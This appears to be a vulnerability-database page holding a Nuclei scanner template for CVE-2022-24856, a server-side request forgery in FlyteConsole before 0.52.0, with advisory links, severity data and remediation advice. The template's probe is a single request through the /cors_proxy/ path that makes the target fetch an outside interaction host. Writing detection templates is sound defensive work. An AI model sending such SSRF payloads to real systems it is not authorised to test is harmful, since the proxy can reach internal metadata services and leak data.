| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| CVE-2022-24856 | 17 May 202220:27 | – | circl | |
| FlyteConsole 代码问题漏洞 | 17 May 202200:00 | – | cnnvd | |
| CVE-2022-24856 | 17 May 202215:25 | – | cve | |
| CVE-2022-24856 Server-Side Request Forgery in FlyteConsole | 17 May 202215:25 | – | cvelist | |
| Uber: Full read SSRF in flyte-poc-us-east4.uberinternal.com | 14 Apr 202203:58 | – | hackerone | |
| CVE-2022-24856 | 17 May 202216:15 | – | nvd | |
| CVE-2022-24856 Server-Side Request Forgery in FlyteConsole | 17 May 202215:25 | – | osv | |
| Server side request forgery (ssrf) | 17 May 202216:15 | – | prion | |
| CVE-2022-24856 | 5 Feb 202522:00 | – | redhatcve |
id: CVE-2022-24856
info:
name: Flyte Console <0.52.0 - Server-Side Request Forgery
author: pdteam
severity: high
description: |
FlyteConsole is the web user interface for the Flyte platform. FlyteConsole prior to version 0.52.0 is vulnerable to server-side request forgery when FlyteConsole is open to the general internet. An attacker can exploit any user of a vulnerable instance to access the internal metadata server or other unauthenticated URLs. Passing of headers to an unauthorized actor may occur.
impact: |
An attacker can exploit this vulnerability to perform unauthorized actions, such as accessing internal resources, bypassing security controls, or launching further attacks.
remediation: |
The patch for this issue deletes the entire cors_proxy, as this is no longer required for the console. A patch is available in FlyteConsole version 0.52.0, or as a work-around disable FlyteConsole.
reference:
- https://github.com/flyteorg/flyteconsole/security/advisories/GHSA-www6-hf2v-v9m9
- https://github.com/flyteorg/flyteconsole/pull/389
- https://hackerone.com/reports/1540906
- https://nvd.nist.gov/vuln/detail/CVE-2022-24856
- https://github.com/flyteorg/flyteconsole/commit/05b88ed2d2ecdb5d8a8404efea25414e57189709
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-24856
cwe-id: CWE-918
epss-score: 0.09662
epss-percentile: 0.94914
cpe: cpe:2.3:a:flyte:flyte_console:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: flyte
product: flyte_console
tags: cve2022,cve,flyteconsole,ssrf,oss,hackerone,flyte,vuln
http:
- method: GET
path:
- "{{BaseURL}}/cors_proxy/https://oast.me/"
matchers:
- type: word
words:
- "Interactsh Server"
# digest: 4a0a004730450220550b952a8dd9c209e6318ecf1f0a31ac4b7e6a82dedcdb810f4aaeb38fe2c6ed022100fed6d59cd809f9a47c136b65585fa5dd5c40862999d295015965347af2f7c129:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation